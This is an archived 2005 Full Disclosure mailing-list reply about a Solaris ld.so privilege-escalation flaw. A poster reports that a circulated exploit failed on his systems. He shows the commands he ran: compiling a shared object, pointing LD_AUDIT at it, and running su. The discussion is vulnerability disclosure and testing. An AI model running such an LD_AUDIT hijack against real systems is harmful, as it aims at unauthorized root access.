Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

RE: Solaris 9/10 ld.so fun
From: "Glenn Pitcher" <Glenn.Pitcher () MedImpact com>
Date: Tue, 5 Jul 2005 13:38:50 -0700
I compiled it using Workshop 10 and it doesn't give me root.  I'm on Solaris
9 w/ 112963-18.  Also tried using this on a Solaris 8 box and got the same
results.

bash-2.05$ !cc
cc -xarch=v8plus -xcode=pic32 -G -o /tmp/Schily-Root.so /tmp/Schily-Root.c
bash-2.05$ !export
export LD_AUDIT=/tmp/Schily-Root.so
bash-2.05$ su -
ld.so.1: su: warning: la_version: can't find symbol
ld.so.1: su: warning: /tmp/Schily-Root.so: audit initialization failure:
disabled

---
Glenn Pitcher
IT Security
MedImpact Healthcare Systems
San Diego, CA
858-790-7479
glenn.pitcher @ medimpact.com



-----Original Message-----
From: KF (lists) [mailto:kf_lists () digitalmunition com] 
Sent: Saturday, July 02, 2005 5:29 PM
To: full-disclosure () lists grok org uk
Cc: Przemyslaw Frasunek; bugtraq () securityfocus com
Subject: Re: [Full-disclosure] Solaris 9/10 ld.so fun


Przemyslaw Frasunek wrote:


Vulnerability was confirmed by Sun:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1

There are still no patches available, but workaround was proposed.

 



Here is an exploit for Schillix using venglin's mojo.
-KF




------------------------------------------------------------------------------
This transmission, together with any attachments, is intended only for the use of those to whom it is addressed and may 
contain information that is privileged, confidential, and exempt from disclosure under applicable law.  If you are not 
the intended recipient, you are hereby notified that any distribution or copying of this transmission is strictly 
prohibited.  If you received this transmission in error, please notify the original sender immediately and delete this 
message, along with any attachments, from your computer.
==============================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]